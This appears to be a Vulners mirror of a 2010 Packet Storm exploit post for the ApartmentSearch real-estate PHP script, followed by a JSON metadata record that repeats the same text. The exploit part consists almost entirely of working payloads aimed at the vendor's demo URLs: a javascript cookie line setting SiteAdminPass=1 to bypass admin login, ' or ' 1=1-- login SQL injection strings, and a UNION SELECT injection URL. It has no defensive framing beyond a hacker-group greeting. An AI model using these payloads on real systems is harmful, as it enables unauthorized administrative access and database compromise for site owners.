Search...

ApartmentSearch Insecure Cookie Handling / SQL Injection

2010-02-10T00:00:00

ID PACKETSTORM:86123
Type packetstorm
Reporter jiko
Modified 2010-02-10T00:00:00

Description

                                        
                                            ` |=-----------------------------------------------------=|  
|=-------------=[ JIKO |No-exploit.Com| ]=-----------=|  
|=-----------------------------------------------------=|  
[~]-----------|00|  
NAme :JIKO (JAWAD)  
Home :No-exploit.Com  
Mail : !x!  
[~]-----------|01|  
-{Script}  
name :ApartmentSearch  
link :http://www.ezonescripts.com/productdemos/ApartmentSearch/Site_Admin/admin.php  
  
[~]-----------|02|  
-{3xpl01t}  
javascript:document.cookie="SiteAdminPass=1; path=/productdemos/ApartmentSearch/Site_Admin/";  
USer:' or ' 1=1--  
pass:' or ' 1=1--  
http://www.ezonescripts.com/productdemos/ApartmentSearch/listtest.php?r=-1%20union%20select%200,user()--  
[~]-----------|03|  
-{Greetz}  
Cyber-Zone,HxH,Hussin X,sniper code,Stack,HiSoKa,The SadHacker  
|No-Exploit.com Members  
---------------------------------------------------------  
  
`

JSON Vulners Source

Initial Source

{"id": "PACKETSTORM:86123", "type": "packetstorm", "bulletinFamily": "exploit", "title": "ApartmentSearch Insecure Cookie Handling / SQL Injection", "description": "", "published": "2010-02-10T00:00:00", "modified": "2010-02-10T00:00:00", "cvss": {"vector": "NONE", "score": 0.0}, "href": "https://packetstormsecurity.com/files/86123/ApartmentSearch-Insecure-Cookie-Handling-SQL-Injection.html", "reporter": "jiko", "references": [], "cvelist": [], "lastseen": "2016-11-03T10:16:53", "viewCount": 8, "enchantments": {"score": {"value": 0.7, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.7}, "sourceHref": "https://packetstormsecurity.com/files/download/86123/apartmentsearch-insecuresql.txt", "sourceData": "` |=-----------------------------------------------------=| \n|=-------------=[ JIKO |No-exploit.Com| ]=-----------=| \n|=-----------------------------------------------------=| \n[~]-----------|00| \nNAme :JIKO (JAWAD) \nHome :No-exploit.Com \nMail : !x! \n[~]-----------|01| \n-{Script} \nname :ApartmentSearch \nlink :http://www.ezonescripts.com/productdemos/ApartmentSearch/Site_Admin/admin.php \n \n[~]-----------|02| \n-{3xpl01t} \njavascript:document.cookie=\"SiteAdminPass=1; path=/productdemos/ApartmentSearch/Site_Admin/\"; \nUSer:' or ' 1=1-- \npass:' or ' 1=1-- \nhttp://www.ezonescripts.com/productdemos/ApartmentSearch/listtest.php?r=-1%20union%20select%200,user()-- \n[~]-----------|03| \n-{Greetz} \nCyber-Zone,HxH,Hussin X,sniper code,Stack,HiSoKa,The SadHacker \n|No-Exploit.com Members \n--------------------------------------------------------- \n \n`\n", "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645262497}}